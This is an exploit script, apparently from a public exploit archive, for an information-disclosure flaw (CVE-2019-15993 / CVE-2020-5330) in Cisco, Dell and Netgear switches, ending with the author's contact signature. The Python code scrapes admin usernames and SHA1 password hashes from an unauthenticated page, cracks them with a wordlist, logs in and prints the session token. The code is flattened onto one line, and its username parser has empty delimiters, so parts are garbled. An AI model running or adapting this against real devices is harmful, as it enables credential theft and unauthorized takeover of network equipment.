# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure # DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos # CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter # Discovered by Ken 's1ngular1ty' Pyle # CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter # Discovered by Ken 's1ngular1ty' Pyle import requests import re import hashlib import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning if len(sys.argv) < 3: print("Usage: python cve-2019-15993.py URL passwordfile") sys.exit() url = sys.argv[1] file = sys.argv[2] requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def hash_value(value): """Calculate the SHA1 hash of a value.""" sha1 = hashlib.sha1() sha1.update(value.encode('utf-8')) return sha1.hexdigest() def userName_parser(text, start_delimiter, end_delimiter): results = [] iteration = 0 start = 0 while start >= 0: start = text.find(start_delimiter, start) if start >= 0: start += len(start_delimiter) end = text.find(end_delimiter, start) if end >= 0: results.append(text[start:end]) start = end + len(end_delimiter) iteration = iteration + 1 return results # retrieve the web page response = requests.get(url, allow_redirects=False, verify=False) # Read in the values from the file with open(file, 'r') as f: values = f.readlines() values = [value.strip() for value in values] hashes = {hash_value(value): value for value in values} if response.status_code == 302: print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n") url = response.headers["Location"] + "config/device/adminusersetting" response=requests.get(url, verify=False) if response.status_code == 200: print("[*] Successful request to URL:", url + "\n") content = response.text users_names = userName_parser(content,"","") sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content) print("SHA1 Hashes found:\n") loops = 0 while loops < len(sha1_hashes): print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n") for sha1_hash in sha1_hashes: if sha1_hash in hashes: print("Match:", sha1_hash, hashes[sha1_hash]) print("\nTesting Credentials via API.\n\n") payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash]) response_login = requests.get(payload, allow_redirects=False, verify=False) headers = response_login.headers if "sessionID" in headers: print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n") print(headers["sessionID"]) else: print("Unable to sign in.") loops = loops + 1 else: print("Host is not vulnerable:", response.status_code) [cid:2b37ad37-9b26-416d-b485-c88954c0ab53] Ken Pyle M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+ Main: 267-540-3337 Direct: 484-498-8340 Email: kp@cybir.com Website: www.cybir.com